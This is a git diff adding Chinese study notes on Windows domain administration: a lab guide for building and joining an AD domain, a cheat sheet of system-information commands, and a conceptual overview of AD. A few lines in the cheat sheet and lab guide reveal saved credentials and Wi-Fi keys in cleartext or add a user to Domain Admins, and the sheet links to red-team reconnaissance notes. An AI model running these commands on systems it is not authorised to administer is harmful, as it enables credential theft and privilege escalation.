+创建域首先要创建 DC,DC 创建完成后,把所有的客户端加入到 DC,这样就形成了域环境。
+
+DC 域控制器是由工作组计算机升级而成,通过 dcpromo 命令就可以完成升级。只有 Windows Server(WEB 版本除外)才可以提升为域控制器。在升级 DC 之前不需要安装 DNS 服务,域控制器上必须要有 NTFS 文件系统的分区。
+
+---
+
+# 安装域控
+
+这里域为 ffffffff0x.com
+
+## Windows Server 2008 R2 安装域控
+
+首先,域控制器需要固定的 ip 地址以及 DNS 服务器为自己
+
+![](../../../../assets/img/运维/Windows/实验/域/1.png)
+
+WIN+R ,打开运行框,输入:dcpromo
+
+![](../../../../assets/img/运维/Windows/实验/域/2.png)
+
+一路下一步,选择 “在新林中新建域”
+
+![](../../../../assets/img/运维/Windows/实验/域/3.png)
+
+填写域名(FQDN)
+
+![](../../../../assets/img/运维/Windows/实验/域/4.png)
+
+设置林功能级别位 2008 R2
+
+![](../../../../assets/img/运维/Windows/实验/域/5.png)
+
+然后它会自动检查 DNS 的配置,需要会时间。
+
+如果你主机原来没有安装 DNS 的话,它会自动帮你勾选上 DNS,然后你点击下一步就可以,这时会弹出无法创建 DNS 服务器的委派,无视,直接点击 “是” 即可。
+
+![](../../../../assets/img/运维/Windows/实验/域/6.png)
+
+安装位置默认即可,因为 SYSVOL 文件必须得在 NTFS 文件系统的磁盘上,所以域控服务器必须得有 NTFS 文件系统的分区。
+
+![](../../../../assets/img/运维/Windows/实验/域/7.png)
+
+然后填目录还原模式的 Administrator 密码,这里就填 Abcd1234,下一步
+
+![](../../../../assets/img/运维/Windows/实验/域/8.png)
+
+等待安装完毕,然后重启计算机以完成配置。
+
+![](../../../../assets/img/运维/Windows/实验/域/9.png)
+
+---
+
+**配置检查**
+
+重新启动后,第一次登陆需要修改密码,这里改成 Abcd12345 ,然后检查下面这些是否正确
+- 检查活动目录是否正常安装
+- 检查 DNS 服务域控制器注册的 SRV 记录
+
+打开服务器管理器,查看角色
+
+![](../../../../assets/img/运维/Windows/实验/域/10.png)
+
+查看 DNS
+
+![](../../../../assets/img/运维/Windows/实验/域/11.png)
+
+在计算机成为域控后,该主机上之前的账号将全部变为域账号,这些账号将不能以本地登录方式登录。成为域控之后新建的用户,必须满足密码规则。如果成为域控后新建的用户不属于 administrators 组,则这些用户可以登录除域控外的其他域内主机。域控只允许 administrators 组内的用户以域身份登录,域控不能以本地身份登录。
+
+域控中 administrator 组内的用户都是域管理员!
+
+---
+
+## Windows Server 2019 安装域控
+
+首先,和 2008 一样,域控制器需要固定的 ip 地址以及 DNS 服务器为自己,这里略
+
+然后在服务器管理器中点击添加角色和功能
+
+![](../../../../assets/img/运维/Windows/实验/域/12.png)
+
+安装前的检查提示,直接下一步,默认选择基于角色或基于功能的安装,直接下一步
+
+![](../../../../assets/img/运维/Windows/实验/域/13.png)
+
+默认选择安装在当前的服务器上,直接下一步
+
+![](../../../../assets/img/运维/Windows/实验/域/14.png)
+
+选择 Active Directory 域服务
+
+![](../../../../assets/img/运维/Windows/实验/域/15.png)
+
+弹出提示,直接点击添加功能
+
+![](../../../../assets/img/运维/Windows/实验/域/16.png)
+
+一路下一步,到安装,等待角色安装完成,点击将此服务器提升为域控制器
+
+![](../../../../assets/img/运维/Windows/实验/域/17.png)
+
+**将服务器提升为域控制器**
+
+选择添加新林,输入根域名,点击下一步
+
+![](../../../../assets/img/运维/Windows/实验/域/18.png)
+
+这里选择林和域的功能级别,还有密码
+
+![](../../../../assets/img/运维/Windows/实验/域/19.png)
+
+然后一路下一步,直到安装完成,安装完成后会自动重启
+
+---
+
+**检查**
+
+重新启动后,第一次登陆需要修改密码,这里改成 Abcd12345 ,然后检查下面这些是否正确
+
+打开管理工具中的 “Active Directory 用户和计算机”
+
+![](../../../../assets/img/运维/Windows/实验/域/20.png)
+
+DNS管理器
+
+![](../../../../assets/img/运维/Windows/实验/域/21.png)
+
+---
+
+# 加入域
+
+加入之前创建好的 ffffffff0x.com ,域控 IP 192.168.141.141
+
+## 2008 加入域
+
+首先将主机的 DNS 指向域控服务器的 ip,并且确保两者之间能通,这里略
+
+计算机-属性-高级系统设置-计算机名,更改,然后将主机的域名修改为域对应的名字,确定
+
+![](../../../../assets/img/运维/Windows/实验/域/22.png)
+
+然后会叫你输入域内的用户名,administrator 和 域内普通用户名 都可。
+
+![](../../../../assets/img/运维/Windows/实验/域/23.png)
+
+- ffffffff0x\Administrator
+- Abcd12345
+
+![](../../../../assets/img/运维/Windows/实验/域/24.png)
+
+然后重启
+
+当计算机加入域后,系统会自动将域管理员组添加到本地系统管理员组中。
+
+---
+
+## Win7 加入域
+
+过程和 2008 没什么区别,这里给 win7 单独在域控上创建一个用户
+
+![](../../../../assets/img/运维/Windows/实验/域/29.png)
+
+![](../../../../assets/img/运维/Windows/实验/域/30.png)
+
+密码就填 Abcd1234 即可
+
+![](../../../../assets/img/运维/Windows/实验/域/31.png)
+
+然后在 win7 中,首先将主机的 DNS 指向域控服务器的 ip,并且确保两者之间能通,这里略
+
+打开计算机-属性-高级系统设置-计算机名,更改,然后将主机的域名修改为域对应的名字,确定
+
+![](../../../../assets/img/运维/Windows/实验/域/32.png)
+
+![](../../../../assets/img/运维/Windows/实验/域/33.png)
+
+---
+
+# 域中主机的登录
+
+如果你是想以本地的用户登录,主机名\用户名 ,该方式是通过SAM来进行NTLM认证的。
+
+![](../../../../assets/img/运维/Windows/实验/域/25.png)
+
+如果你是以域中的用户登录,域名\用户名 (域名部分不用加.com) 或者用户名@域名,该方式是通过Kerberos协议进行认证的
+
+![](../../../../assets/img/运维/Windows/实验/域/26.png)
+
+![](../../../../assets/img/运维/Windows/实验/域/27.png)
+
+在域控上,使用 dsquery computer 命令可以查询域内所有的主机。
+
+![](../../../../assets/img/运维/Windows/实验/域/28.png)
+
+域控上的所有用户均可以登录域中的任意一台主机(域控除外,默认情况下域控只允许域内的 Administrator 用户才能登陆),而域中的普通主机上的用户只能以本地身份登录该主机。
+
+---
+
+# 域中主机的退出
+
+计算机要么是工作组计算机,要么是域中的计算机,不能同时属于域和工作组,如果将计算机加入到工作组,计算机将自动从域中退出。退出时需要输入域管理员账号和密码。
+
+![](../../../../assets/img/运维/Windows/实验/域/35.png)
+
+---
+
+# 域用户管理
+
+**添加域用户**
+
+在域控上添加的用户都是域用户。如果想在其他域成员主机上添加域用户,需要在域成员主机上以域管理员权限登录,然后执行以下命令添加域用户
+```
+net user test Abcd1234 /add /domain 添加域用户 test,密码为 Abcd1234
+net group "domain admins" test /add /domain 将域用户 test 添加到域管理员组
+```
+
+**禁用域中的账户**
+
+加入到域的计算机,如果不打算让使用者在该计算机上使用域用户登录,可以禁用计算机账户。但是这样只会禁止域控服务器在成为域控服务器之后创建的用户,之前创建的用户不受影响
+
+![](../../../../assets/img/运维/Windows/实验/域/34.png)
+
+---
+
+# SRV 出错及解决办法
+
+由于某种原因,装完活动目录后发现 DNS 上正向区域的 SRV 记录不全或者没有,需要采取以下措施,强制让域控制器向 DNS 注册 SRV 记录。
+
+删除 DNS 服务器上的正向解析。然后 管理工具→DNS→正向查找区域→右键,新建 _msdcs.ffffffff0x.com 和 ffffffff0x.com 的区域
+
+然后重启 netlogon 服务 停止服务命令:net stop netlogon 启动服务命令:net start netlogon
+
+**SRV 记录注册不成功的可能原因**
+
+1. DNS 区域名称是否正确,是否允许安全更新
+2. 确保域控制器全名已经包含了活动目录的名字
+3. 确保域控制器的 TCP/IP 属性已经选中“在DNS中注册此链接的地址”
+
+---
+
+**Source & Reference**
+- [内网渗透 | 搭建域环境](https://mp.weixin.qq.com/s/SUznjF43IPSigGnkvEve9g)
+- [最快的方式搭建域环境](https://payloads.online/archivers/2019-04-13/1)
+- [Windows Server 2019 安装DC域控](https://blog.51cto.com/12025450/2446545)
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\346\234\215\345\212\241\346\220\255\345\273\272.md" "b/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\272\347\241\200\346\234\215\345\212\241\346\220\255\345\273\272.md"
similarity index 94%
rename from "1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\346\234\215\345\212\241\346\220\255\345\273\272.md"
rename to "1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\272\347\241\200\346\234\215\345\212\241\346\220\255\345\273\272.md"
index 9650055b..8c59e1e5 100644
--- "a/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\346\234\215\345\212\241\346\220\255\345\273\272.md"
+++ "b/1earn/\350\277\220\347\273\264/Windows/\345\256\236\351\252\214/Windows\345\237\272\347\241\200\346\234\215\345\212\241\346\220\255\345\273\272.md"
@@ -1,4 +1,4 @@
-# Windows 服务搭建
+# Windows 基础服务搭建
---
@@ -6,29 +6,29 @@
**例1**
-1. 新建两个 10G 的硬盘,名称为 A-10-1、A-10-2,挂载到主机 A;
+1. 新建两个 10G 的硬盘,名称为 A-10-1、A-10-2,挂载到主机;
2. 新建镜像卷,使用所有空间,驱动器号为 D.
```markdown
1. 开始——管理工具——计算机管理——存储——磁盘管理
-2. 把新建的磁盘1和2联机初始化
-3. 右键磁盘1——建立镜像卷——指定2个磁盘——分配盘符——一路下一步
+2. 把新建的磁盘 1 和 2 联机初始化
+3. 右键磁盘 1——建立镜像卷——指定2个磁盘——分配盘符——一路下一步
```
**例2**
-1. 新建一个 10G 的硬盘,名称为 A-10-1,挂载到主机A
+1. 新建一个 10G 的硬盘,名称为 A-10-1,挂载到主机;
2. 将该硬盘做如下配置:配置为动态磁盘,并创建一个普通卷,大小为 10G,文件系统为 NTFS,驱动器号为 D.
```markdown
1. 开始——管理工具——计算机管理——存储——磁盘管理
-2. 把新建的磁盘1联机初始化
-3. 右键磁盘1——转换成动态磁盘——新建简单卷——分配盘符——一路下一步
+2. 把新建的磁盘 1 联机初始化
+3. 右键磁盘 1——转换成动态磁盘——新建简单卷——分配盘符——一路下一步
```
**例3**
-1. 新建三个 10G 的硬盘,名称为 A-10-1、A-10-2、A-10-3,挂载到主机 A;
+1. 新建三个 10G 的硬盘,名称为 A-10-1、A-10-2、A-10-3,挂载到主机;
2. 新建 RAID-5 卷,使用所有空间,驱动器号为 D.
```markdown
@@ -43,22 +43,22 @@
**例1**
-1. 配置 abc.com 域的从 DNS 服务,主 DNS 为主机 A.
-2. 配置 0.16.172 反向域的从 DNS 服务,主 DNS 为主机 A.
+1. 配置 abc.com 域的从 DNS 服务,主 DNS 为本机.
+2. 配置 0.16.172 反向域的从 DNS 服务,主 DNS 为本机.
```markdown
1. 服务器管理器——添加角色——DNS 服务器
2. 服务器管理器——角色——DNS 服务器
-3. 正向查找区域——新建区域——辅助区域——abc.com——输入主机A的 IP
-4. 反向查找区域——新建区域——辅助区域——172.16.0——输入主机A的 IP
+3. 正向查找区域——新建区域——辅助区域——abc.com——输入本机的 IP
+4. 反向查找区域——新建区域——辅助区域——172.16.0——输入本机的 IP
```
**例2**
-1. 将 ftp.abc.com 解析至主机B公网 IP;
-2. 将 www.abc.com 解析至主机A公网 IP;
+1. 将 ftp.abc.com 解析至本机 IP;
+2. 将 www.abc.com 解析至本机 IP;
3. 建立反向简析区域完成 ftp.abc.com,www.abc.com,域名的反向解析;
-4. 只允许主机B 192.168.XX+1.33 的 ip 进行区域传送.
+4. 允许本机对 192.168.XX+1.33 的 ip 进行区域传送.
```markdown
1. 服务器管理器——添加角色——DNS 服务器
@@ -215,7 +215,7 @@
2. 加密服务提供程序为"RSA##Microsoft Software Key Storage Providew",密钥字符长度为"2048";
3. 颁发的签名证书的哈希算法为"SHA256";
4. CA 证书名称:ca.abc.com;
-5. 为主机 B 的 web 服务提供证书,颁发的证书命名为 httpd.crt.
+5. 为 Linux 主机的 web 服务提供证书,颁发的证书命名为 httpd.crt.
```markdown
1. linux 生成 csr 文件传过来
@@ -298,7 +298,7 @@
**例1**
-1. 配置telnet服务
+1. 配置 telnet 服务
```markdown
1. 服务器管理器——添加功能——Telnet 服务器
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\344\277\241\346\201\257.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
new file mode 100644
index 00000000..ddff0030
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\344\277\241\346\201\257.md"
@@ -0,0 +1,200 @@
+# 信息
+
+`记录收集 Windows 系统软硬件信息的命令`
+
+- 域信息见 [信息收集](../../../安全/笔记/RedTeam/信息收集.md#域信息) 笔记
+
+---
+
+# 大纲
+
+* **[软件](#软件)**
+ * [版本信息](#版本信息)
+ * [环境变量](#环境变量)
+ * [开机启动](#开机启动)
+ * [日志](#日志)
+ * [应用服务](#应用服务)
+ * [用户相关](#用户相关)
+
+* **[硬件](#硬件)**
+ * [网络](#网络)
+ * [硬盘文件系统](#硬盘文件系统)
+
+---
+
+# 软件
+
+## 版本信息
+
+```cmd
+ver windows 版本
+winver 弹框显示当前windows系统信息
+hostname 显示当前机器名
+msinfo32 系统信息面板
+systeminfo 查看当前计算机的综合信息
+finger username @host 查看最近有哪些用户登陆
+sc showsid server 查看 SID
+```
+
+**凭据**
+```
+cmdkey 凭据 Credential(保存的用户名和密码)
+ cmdkey /list 列出可用的凭据
+ cmdkey /list:10.12.190.82 列出指定目标的凭据
+ cmdkey /list:Domain:target=10.12.190.82 列出指定目标的凭据
+
+ cmdkey /add:Domain:target=10.12.190.82 /user:LiLei /pass:123456
+ 若target为10.12.190.82的凭据不存在,则添加;否则就将10.12.190.82凭据的用户名修改为LiLei,密码修改为123456
+
+ cmdkey /delete:Domain:target=10.12.190.82 删除指定目标的凭据
+```
+
+**激活信息**
+```cmd
+slmgr.vbs 查看当前系统 Windows 中的激活状态以及密钥、许可证书等信息
+ slmgr.vbs -dlv 显示详细的许可证信息
+ slmgr.vbs -dli 显示许可证信息
+ slmgr.vbs -xpr 当前许可证截止日期
+ slmgr.vbs -dti 显示安装 ID 以进行脱机激
+ slmgr.vbs -ipk (Product Key) 安装产品密钥
+ slmgr.vbs -ato 激活 Windows
+ slmgr.vbs -cpky 从注册表中清除产品密钥(防止泄露引起的攻击)
+ slmgr.vbs -ilc (License file)安装许可证
+ slmgr.vbs -upk 卸载产品密钥
+ slmgr.vbs -skms (name[ort])批量授权
+```
+
+---
+
+## 环境变量
+
+```
+set
+```
+
+---
+
+## 开机启动
+
+**计划任务信息**
+```
+schtasks /query /fo LIST /v
+```
+
+---
+
+## 日志
+
+开始-运行,输入 `eventvwr.msc` 打开事件查看器,查看日志
+
+---
+
+## 应用服务
+
+**进程信息**
+```cmd
+wmic process where Caption="buyticket.exe" get commandline,ExecutablePath,ProcessId,ThreadCount /value
+查看名为"buyticket.exe"所有进程命令行,exe 全路径,PID 及线程数
+
+wmic process where Caption="buyticket.exe" get ExecutablePath,HandleCount /value
+查看名为"buyticket.exe"所有进程的 exe 全路径及当前打开的句柄数
+
+wmic process where Caption="buyticket.exe" get ExecutablePath,VirtualSize,WorkingSetSize /value
+查看名为"buyticket.exe"所有进程的 exe 全路径、当前虚拟地址空间占用及物理内存工作集
+
+tasklist 显示所有进程及其服务
+
+ tasklist /svc
+
+ tasklist /fi "pid eq 1234" /svc 显示指定进程信息
+ tasklist /fi "status eq running" /svc
+ tasklist /fi "status eq running" /fi "username eq nt authority\system" /svc
+
+ tasklist /m xxx.dll 显示使用给定 exe/dll 名称的所有进程
+
+ tasklist /s ip /u username /p password /svc 显示远程主机的进程信息
+```
+
+---
+
+## 用户相关
+
+```cmd
+whoami 查看当前用户
+net user 查看计算机用户列表
+net localgroup 查看计算机用户组列表
+net accounts 查看本地密码策略
+```
+
+---
+
+# 硬件
+
+```cmd
+wmic 查看硬件的信息
+ wmic logicaldisk 查看计算机上各个盘的相关信息
+
+ wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
+ 获取 C 盘的剩余空间大小与总大小(单位:Byte)
+
+ wmic os get Caption,InstallDate,OSArchitecture /value
+ 获取当前 os 的 Caption、安装日期以及系统架构信息
+```
+
+## 网络
+
+**IP 地址**
+```cmd
+ipconfig 查看 ip 地址
+ipconfig /all 查看本机 IP,所在域
+```
+
+**端口**
+```cmd
+netstat -ano 查看系统开放端口
+netstat –an/ano/anb 网络连接查询
+```
+
+**路由表**
+```cmd
+route print 路由表
+```
+
+**arp 条目**
+```cmd
+arp -a 查看全部 arp 条目
+```
+
+**防火墙**
+```cmd
+netsh firewall show state
+netsh advfirewall show allprofiles
+```
+
+**查看端口转发**
+```cmd
+netsh interface portproxy show all
+netsh interface portproxy show v4tov4
+netsh interface portproxy show v4tov6
+netsh interface portproxy show v6tov4
+netsh interface portproxy show v6tov6
+```
+
+**查看无线网络信息**
+```cmd
+netsh wlan show profiles
+```
+
+**查看指定 WIFI 密码**
+```cmd
+netsh wlan show profiles wifi_name key=clear
+```
+
+---
+
+## 硬盘文件系统
+
+**卷标**
+```cmd
+vol 显示当前分区的卷标
+```
diff --git "a/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237.md" "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237.md"
new file mode 100644
index 00000000..b58d8715
--- /dev/null
+++ "b/1earn/\350\277\220\347\273\264/Windows/\347\254\224\350\256\260/\345\237\237.md"
@@ -0,0 +1,269 @@
+# 域
+
+
+
+
+
+> 注 : 笔记中拓扑图 xmind 源文件在其图片目录下
+
+---
+
+# 大纲
+
+* **[域的原理](#域的原理)**
+
+* **[域结构](#域结构)**
+ * [单域](#单域)
+ * [域树](#域树)
+ * [域林](#域林)
+ * [GC 全局编录](#gc)
+ * [FSMO](#fsmo)
+ * [域信任关系](#域信任关系)
+
+* **[DC 域控](#dc)**
+ * [PDC 主域控制器](#pdc)
+ * [BDC 辅域控制器](#ndc)
+ * [RODC 只读域控制器](#rodc)
+
+* **[AD 活动目录](#ad)**
+
+* **[DNS 域名服务器](#dns域名服务器)**
+
+---
+
+域用来描述一种架构,和“工作组”相对应,由工作组升级而来的高级架构,域 (Domain)是一个有安全边界的计算机集合 (安全边界,意思是在两个域中,一个域中的用户无法访问另一个域中的资源)。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。
+
+**域的功能和特点**
+
+- 集中管理,可以集中地管理企业中成千上万分布于异地的计算机和用户
+- 便捷的资源访问,能够很容易地定位到域中的资源。用户依次登录就可以访问整个网络资源,集中地身份验证
+- 可扩展性,既可以适用于几十台计算机的小规模网络,也可以用于跨国公司
+
+**工作组和域的区别**
+
+工作组是对等网络,域是 B/S 架构,集中式管理
+
+![](../../../../assets/img/运维/Windows/笔记/域/1.png)
+
+---
+
+# 域的原理
+
+其实可以把域和工作组联系起来理解,在工作组上你一切的设置比如在本机上进行各种策略,用户登录都是登录在本机的,密码是放在本机的数据库来验证的。而如果你的计算机加入域的话,各种策略是域控制器统一设定,用户名和密码也是放到域控制器去验证,也就是说你的账号密码(域用户)可以在同一个域的任何一台计算机登录。
+
+如果说工作组是“免费的旅店”,那么域 (Domain)就是“星级的宾馆”;工作组可以随便出出进进,而域则需要严格控制。“域”的真正含义指的是服务器控制网络上的计算机能否加入计算机组合。一提到组合,势必需要严格的控制。所以实行严格的管理对网络安全是非常必要的。在对等网模式下,任何一台电脑只要接入网络,其他机器就都可以访问共享资源,如共享文件夹等。尽管对等网络上的共享文件可以加访问密码,但是非常容易被破解。
+
+不过在“域”模式下,至少有一台服务器负责每一台联入网络的电脑和用户的验证工作,相当于一个单位的门卫一样,称为域控制器 (Domain Controller,简写为 DC)。
+
+域控制器中包含了这个域内的账户、密码、域内的计算机等信息构成的数据库(AD)。当电脑联入网络时,域控制器首先要鉴别这台电脑是否属于这个域,使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒绝这个用户从这台电脑登录。不能登录,用户就不能访问服务器上有权限保护的资源,他只能以对等网用户的方式访问Windows共享出来的资源,这样就在一定程度上保护了网络上的资源。
+
+要把一台电脑加入域,仅仅使它和服务器在网上邻居中能够相互“看”到是远远不够的,必须要由网络管理员进行相应的设置,把这台电脑加入到域中。这样才能实现文件的共享,集中统一,便于管理
+
+在域控上,即使以域管理员的身份登录,也不能查看域成员的密码,可以给域成员重置密码,但是不能查看到域成员的密码。
+
+---
+
+# 域结构
+
+## 单域
+
+在一般的具有固定地理位置的小公司里,建立一个域就可以满足所需。
+
+![](../../../../assets/img/运维/Windows/笔记/域/2.png)
+
+---
+
+## 域树
+
+域树指若干个域通过建立信任关系组成的集合。一个域管理员只能管理本域的内部,不能访问或者管理其他的域,二个域之间相互访问则需要建立 信任关系 (Trust Relation)。信任关系是连接在域与域之间的桥梁。父域与子域之间自动建立起了双向信任关系,域树内的父域与子域之间不但可以按需要相互进行管理,还可以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互通信和数据传输。
+
+同一个域树中,父域和子域会自动创建双向信任关系,并且信任关系可传递。所以也就是如下:`abc.com` 自动与 `asia.abc.com` 和 `europe.abc.com` 建立起了双向信任关系,`asia.abc.com` 和 `cn.asia.abc.com` 以及 `europe.abc.com` 与 `fr.europe.abc.com` 自动建立起了双向信任关系。由于信任关系可以传递,所以 `cn.asia.abc.com` 和 `abc.com` 以及 `fr.europe.abc.com` 和 `abc.com` 都自动建立起了双向信任关系。但是 `asia.abc.com` 和 `europe.abc.com` 之间并没有建立起信任关系。所以也就是 `asia.abc.com` 和 `europe.abc.com` 之间不能进行数据共享等操作。他们之间要想进行数据共享等操作,需要手动为他们之间建立信任关系。
+
+![](../../../../assets/img/运维/Windows/笔记/域/3.png)
+
+**建立域树的好处**
+
+- 如果把不同地理位置的分公司放在同一个域内,那么他们之间信息交互 (包括同步,复制等)所花费的时间会比较长,而且占用的带宽也比较大。因为在同一个域内,信息交互的条目是很多的,而且不压缩;而在域和域之间,信息交互的条目相对较少,而且压缩。
+- 子公司可以通过自己的域来管理自己的资源。
+- 出于安全策略的考虑,因为每个域都有自己独有的安全策略。比如一个公司的财务部门希望能使用特定的安全策略 (包括帐号密码策略等),那么可以将财务部门做成一个子域来单独管理
+
+**父域与子域**
+
+在一个域树中,父域可以包含很多子域,子域是相对父域来说的,指域名中的每一个段。子域只能使用父域作为域名的后缀,也就是说在一个域树中,域的名字是连续的。
+
+第一个域称为父域也可以叫根域,各分部的域称为该域的子域。
+
+![](../../../../assets/img/运维/Windows/笔记/域/4.png)
+
+父域与子域之间默认建立起了双向信任关系。
+
+---
+
+## 域林
+
+域林指若干个域树通过建立信任关系组成的集合。
+
+由一个或多个没有形成连续名称空间的域树组成,林中每个域树都有唯一的名称空间,之间不连续。
+
+可以通过域树之间建立的信任关系来管理和使用整个域林中的资源,从而又保持了原有域自身原有的特性。同一个林中,林根域与其他树根域自动建立双向信任关系. 信任关系可传递
+
+![](../../../../assets/img/运维/Windows/笔记/域/5.png)
+
+### GC
+
+全局编录包含了各个活动目录中每一个对象的最重要的属性,是域林中所有对象的集合。
+
+在域林中,同一域林中的域控制器共享同一个活动目录,这个活动目录是分散存放在各个域的域控制器中的,每个域中的域控制器保存着该域的对象的信息 (用户账号及目录数据库等)。如果一个域中的用户要访问另一个域中的资源,则要先找到另一个域中的资源。为了让用户快速的查找到另一个域内的对象,微软设计了全局编录。全局编录包含了各个活动目录中每一个对象的最重要的属性 (即部分属性),这样,即使用户或应用程序不知道对象位于哪个域,也可以迅速找到被访问的对象。
+
+### FSMO
+
+营运主机 (Operation Masters,又称为 Flexible Single Master Operation,即 FSMO)是被设置为担任提供特定角色信息的网域控制站,在每一个活动目录网域中,至少会存在三种营运主机的角色。但对于大型的网络,整个域森林中,存在5种重要的 FSMO 角色.而且这些角色都是唯一的。
+
+- naming master (域命名主机角色) : 域命名主机角色是林范围的角色,每个林一个。此角色用于向林中添加或从林中删除域或应用程序分区。
+- infrastructure master (结构主机角色) : 结构主机角色是域范围的角色,每个域一个。此角色供域控制器使用,用于成功运行 adprep /forestprep 命令,以及更新跨域引用的对象的 SID 属性和可分辨名称属性。
+- PDC (PDC 模拟器角色) : PDC 模拟器角色是域范围的角色,每个域一个。将数据库更新发送到 Windows NT 备份域控制器的域控制器需要具备这个角色。此外,拥有此角色的域控制器也是某些管理工具的目标,它还可以更新用户帐户密码和计算机帐户密码。
+- RID master (RID 主机角色) : RID 主机角色是域范围的角色,每个域一个。此角色用于分配 RID 池,以便新的或现有的域控制器能够创建用户帐户、计算机帐户或安全组。
+- schema master (架构主机角色) : 架构主机角色是林范围的角色,每个林一个。此角色用于扩展 Active Directory 林的架构或运行 adprep /domainprep 命令。
+
+---
+
+## 域信任关系
+
+域信任分为单向信任和双向信任。
+- 单向信任 : 只能是受信任域访问信任域,而信任域不能访问受信任域。
+- 双向信任 : 两个域可以互相访问。
+
+域之间的信任关系,相当于是不同域之间沟通的桥梁。
+- 父子信任:父域与子域之间自动建立起了双向信任关系,并且信任关系可以传递。
+- 树信任:同一个林中,林根域与其他树根域自动建立双向信任关系。信任关系可传递。
+- 快捷方式信任:为了加速认证流程而产生的信任关系。需要管理员手工建立,信任关系可向下传递。
+- 林信任:在不更改 AD 结构的情况下,让不同林之间可以相互访问资源。信任关系可向下传递。
+- 外部信任/ 跨林快捷方式信任:类似于同林内的快捷方式信任. 单向, 信任关系不可传递:
+- 领域信任:为了让 AD 跟非 windows 系统的 kerberos 建立关系而存在的信任。
+
+---
+
+# DC
+
+在域架构中域控是用来管理所有客户端的服务器,它负责每一台联入的电脑和用户的验证工作,域内电脑如果想互相访问首先都得经过它的审核。
+
+域控是域架构的核心,每个域控制器上都包含了 AD 活动目录数据库。
+
+一个域中可能应该要有至少两个域控。一个作为 DC,一个是备份 DC。如果没有第二个备份 DC,那么一旦 DC 瘫痪了,则域内的其他用户就不能登陆该域了,因为活动目录的数据库 (包括用户的帐号信息)存储在 DC 中的。而有一台备份域控制器 (BDC),则至少该域还能正常使用,期间把瘫痪的 DC 恢复了就行了。当域中的一台计算机安装了 AD 后,它就成了域控 DC 了。
+
+## PDC
+
+主域控制器是负责验证域登录和维护域目录数据库的计算机。
+
+## BDC
+
+辅域控制器也叫额外域控制器,是指除第一台域控制器之外的其他域控制器。
+
+一个域只能有一个 PDC,可以有0~若干个 BDC
+
+## RODC
+
+RODC 是 Windows Server 2008 操作系统中的一种新类型的域控制器。借助 RODC,组织可以在无法保证物理安全性的位置中轻松部署域控制器。RODC 承载 Active Directory域服务 (AD DS) 数据库的只读分区。
+
+**特性**
+
+- 只读 AD DS 数据库
+
+ RODC 上保存了可写域控制器上除帐号密码外的所有对象和属性的只读副本,所有对 AD DS 数据库的更改都只能在可写域控制器上进行,然后再复制给 RODC; 需要对目录进行读取的应用程序可以获取访问权限。请求写入访问的轻型目录应用程序协议(LDAP)应用程序将接收 LDAP 引用响应,该响应将其定向到可写域控制器。
+
+- 单向复制
+
+ 因为任何 AD 数据库的更改都不会写入 RODC,所以可写域控制器就不需要从 RODC 上复制任何信息。RODC 只执行正常的入站复制。
+
+- 凭据缓存
+
+ 默认情况下,RODC 上除了 RODC 的计算机帐户和特殊账户 krbtgt 之外,不存储用户或计算机凭据。但可以设置密码复制策略将部分用户凭据和计算机凭据从可写域控制器复制到 RODC 并在 RODC 上缓存起来,从而直接服务登录请求。
+
+- 管理员角色分隔
+
+ 可以将 RODC 的本地管理权限委派给其他域用户,以分担域管理员的工作。 只读 DNS 可以在 RODC 上安装 DNS,响应名称解析的请求,但该 DNS 也是只读的
+
+---
+
+# AD
+
+Active Directory,活动目录简称 AD,是一个基于 DNS 并以树状的数据结构来组成网络服务存储了有关网络对象的信息,并以此作为基础对目录信息进行合乎逻辑的分层组织,让管理员和用户能够轻松地查找和使用这些信息。通常域都只有一个,在中型或大型的网络中,网域可能会有很多个,或是和其他公司或组织的 AD 相互链接。AD 基于 LDAP。安装了 AD 的服务器称为 DC 域控制器。
+
+如果将企业的内网看成是一本字典,那么内网里的资源就是字典的内容, 活动目录就相当于字典的索引。即活动目录存储的是网络中所有资源的快捷方式,用户通过寻找快捷方式而定位资源。
+
+在活动目录中记录的信息,被分为两大部分,一部分保存在活动目录数据库文件 `NTDS.dit` 中,另一部分保存在被复制的文件系统上。
+
+**逻辑结构**
+
+在活动目录中,管理员可以完全忽略被管理对象的具体地理位置,而将这些对象按照一定的方式放置在不同的容器中。由于这种组织对象的做法不考虑被管理对象的具体地理位置,这种组织框架称为 “逻辑结构”。
+
+活动目录的逻辑结构就包括上面讲到的 组织单元 (OU)、域 (domain)、域树 (tree)、域森林 (forest) 。在域树内的所有域共享一个活动目录,这个活动目录内的数据分散地存储在各个域内,且每一个域只存储该域内的数据。
+
+**活动目录的主要功能**
+
+活动目录为 Microsoft 统一管理的基础平台,其它 ISA、Exchange、SMS 等服务都依赖于这个基础平台。
+
+- 帐号集中管理 :所有帐号均存在服务器上,方便对帐号的重命名/重置密码。
+- 软件集中管理 :统一推送软件,统一安装网络打印机等。利用软件发布策略分发软件,可以让用户自由选择安装软件。
+- 环境集中管理 :利用 AD 可以统一客户端桌面,IE,TCP/IP 等设置。
+
+**优点**
+- 增强安全性 :统一部署杀毒软件和扫毒任务,集中化管理用户的计算机权限、统一制订用户密码策略等,可监控网络,资料统一管理。
+- 更可靠:更少的宕机时间。如:利用 AD 控制用户访问权限,利用群集、负载均衡等技术对文件服务器进行容灾设定,更可靠,宕机时间更少。
+
+**容器内容**
+- Builtin 容器 :Builtin 容器是 Active Driectory 默认创建的第一个容器,主要用于保存域中本地安全组。
